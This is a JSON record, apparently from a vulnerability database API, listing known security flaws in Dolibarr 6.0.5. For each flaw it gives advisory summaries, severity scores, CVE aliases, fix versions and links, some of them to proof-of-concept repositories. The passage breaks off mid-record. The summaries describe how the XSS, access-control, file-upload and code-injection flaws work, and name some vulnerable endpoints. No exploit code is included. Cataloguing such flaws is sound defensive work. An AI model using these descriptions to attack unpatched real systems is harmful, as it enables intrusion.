{"url":"http://public2.vulnerablecode.io/api/packages/98317?format=json","purl":"pkg:composer/dolibarr/dolibarr@6.0.5","type":"composer","namespace":"dolibarr","name":"dolibarr","version":"6.0.5","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":null,"latest_non_vulnerable_version":null,"affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/35024?format=json","vulnerability_id":"VCID-1247-tc3p-g3d2","summary":"Dolibarr Cross-site Scripting vulnerability\nCross-site Scripting (XSS) - Generic in GitHub repository dolibarr/dolibarr prior to 18.0.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5323","reference_id":"","reference_type":"","scores":[{"value":"0.00206","scoring_system":"epss","scoring_elements":"0.4294","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5323"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/695ca086847b3b6a185afa93e897972c93c43d15","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-20T15:11:59Z/"}],"url":"https://github.com/dolibarr/dolibarr/commit/695ca086847b3b6a185afa93e897972c93c43d15"},{"reference_url":"https://huntr.dev/bounties/7a048bb7-bfdd-4299-931e-9b
c283e92bc8","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-20T15:11:59Z/"}],"url":"https://huntr.dev/bounties/7a048bb7-bfdd-4299-931e-9bc283e92bc8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5323","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5323"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67209?format=json","purl":"pkg:composer/dolibarr/dolibarr@18.0.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.0"}],"aliases":["CVE-2023-5323","GHSA-39m3-cj8c-886r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1247-tc3p-g3d2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/43033?format=json","vulnerability_id":"VCID-17fx-qrxs-kbhk","summary":"Improper Access Control in Dolibarr\nIn “Dolibarr” application, 2.8.1 to 13.0.4 don’t restrict or incorrectly restricts access to a resource from an unauthorized actor. 
A low privileged attacker can modify the Private Note which only an administrator has rights to do, the affected field is at “/adherents/note.php?id=1” endpoint.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25954","reference_id":"","reference_type":"","scores":[{"value":"0.00171","scoring_system":"epss","scoring_elements":"0.38142","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25954"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/8cc100012d46282799fb19f735a53b7101569377","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/8cc100012d46282799fb19f735a53b7101569377"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25954","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25954"},{"reference_url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25954","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.whitesourcesoftware.com/vulnerability-datab
ase/CVE-2021-25954"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/370707?format=json","purl":"pkg:composer/dolibarr/dolibarr@13.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.5"},{"url":"http://public2.vulnerablecode.io/api/packages/76015?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-jua
s"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0"}],"aliases":["CVE-2021-25954","GHSA-vxhc-c4qm-647p"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-17fx-qrxs-kbhk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42168?format=json","vulnerability_id":"VCID-1qq7-1tkv-kqd3","summary":"Dolibarr vulnerable to Improper Authentication and Improper Access Control\nIn `Dolibarr` application, v3.3.beta1_20121221 to v13.0.2 have `Modify` access for admin level users to change other user’s details but fails to validate already existing “Login” name, while renaming the user `Login`. This leads to complete account takeover of the victim user. 
This happens since the password gets overwritten for the victim user having a similar login name.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25956","reference_id":"","reference_type":"","scores":[{"value":"0.00372","scoring_system":"epss","scoring_elements":"0.5922","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25956"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/c4cba43bade736ab89e31013a6ccee59a6e077ee","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/c4cba43bade736ab89e31013a6ccee59a6e077ee"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25956","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25956"},{"reference_url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25956","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25956"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/
api/packages/370744?format=json","purl":"pkg:composer/dolibarr/dolibarr@13.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/76015?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf
"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0"}],"aliases":["CVE-2021-25956","GHSA-fjqg-w8g6-hhq8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1qq7-1tkv-kqd3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/13970?format=json","vulnerability_id":"VCID-1xws-6qbv-c7h4","summary":"Dolibarr arbitrary file upload vulnerability\nAn arbitrary file upload vulnerability in the Upload Template function of Dolibarr ERP CRM up to v19.0.1 allows attackers to execute arbitrary code via uploading a crafted .SQL 
file.","references":[{"reference_url":"http://dolibarr.com","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-06-20T15:21:39Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-37821","reference_id":"","reference_type":"","scores":[{"value":"0.00234","scoring_system":"epss","scoring_elements":"0.46355","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-37821"},{"reference_url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-37821.md","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-06-20T15:21:39Z/"}],"url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-37821.md"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd
.nist.gov/vuln/detail/CVE-2024-37821","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-37821"},{"reference_url":"https://github.com/advisories/GHSA-p7r8-7w87-8g46","reference_id":"GHSA-p7r8-7w87-8g46","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p7r8-7w87-8g46"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/38106?format=json","purl":"pkg:composer/dolibarr/dolibarr@19.0.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2"}],"aliases":["CVE-2024-37821","GHSA-p7r8-7w87-8g46"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1xws-6qbv-c7h4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/17268?format=json","vulnerability_id":"VCID-2s1r-jffc-dqc7","summary":"Dolibarr Allows Code Injection through its Website Module\nIn Dolibarr ERP & CRM <= 22.0.4, PHP code detection and editing permission enforcement in the Website module is not applied consistently to all input parameters, allowing an authenticated user restricted to HTML/JavaScript editing to inject PHP code through unprotected inputs during website page creation.\n\nA patch is available at 
https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0.","references":[{"reference_url":"http://dolibarr.com","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T15:30:39Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31018","reference_id":"","reference_type":"","scores":[{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15469","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31018"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/ba28d16da4cc0c221f49a878fecc8425501ceb96","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/ba28d16da4cc0c221f49a878fecc8425501ceb96"},{"reference_url":"https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0"},{"reference_url":"https://github.com/PhDg1410/CVE/blob/main/CVE-2026-
31018/README.md","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T15:30:39Z/"}],"url":"https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31018/README.md"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31018","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31018"},{"reference_url":"https://github.com/advisories/GHSA-676v-wh57-p375","reference_id":"GHSA-676v-wh57-p375","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-676v-wh57-p375"}],"fixed_packages":[],"aliases":["CVE-2026-31018","GHSA-676v-wh57-p375"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2s1r-jffc-dqc7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/48777?format=json","vulnerability_id":"VCID-39gm-mkxs-1uf9","summary":"Dolibarr vulnerable to Eval Injection\nDolibarr ERP & CRM <=15.0.3 are vulnerable to Eval injection. 
By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious code can be inserted into the database and then execute it by eval.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-40871","reference_id":"","reference_type":"","scores":[{"value":"0.51559","scoring_system":"epss","scoring_elements":"0.97938","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-40871"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/youncyb/dolibarr-rce","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-05-15T15:00:17Z/"}],"url":"https://github.com/youncyb/dolibarr-rce"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40871","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40871"},{"reference_url":"https://github.com/advisories/GHSA-7cm4-vmf2-8wf2","reference_id":"GHSA-7cm4-vmf2-8wf2","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7cm4-vmf2-8wf2"}],"fixed_packages":[],"aliases":["CVE-2022-40871","GHSA-7cm4-vmf2-8wf
2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-39gm-mkxs-1uf9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61721?format=json","vulnerability_id":"VCID-3spa-q7qf-suez","summary":"Dolibarr Stored Cross-site Scripting in expensereport/card.php\nAn issue was discovered in Dolibarr through 7.0.0. There is Stored XSS in expensereport/card.php in the expense reports plugin via the comments parameter, or a public or private note.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-16808","reference_id":"","reference_type":"","scores":[{"value":"0.00199","scoring_system":"epss","scoring_elements":"0.41909","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-16808"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/9449","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/9449"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-16808","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-16808"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/180056?format=jso
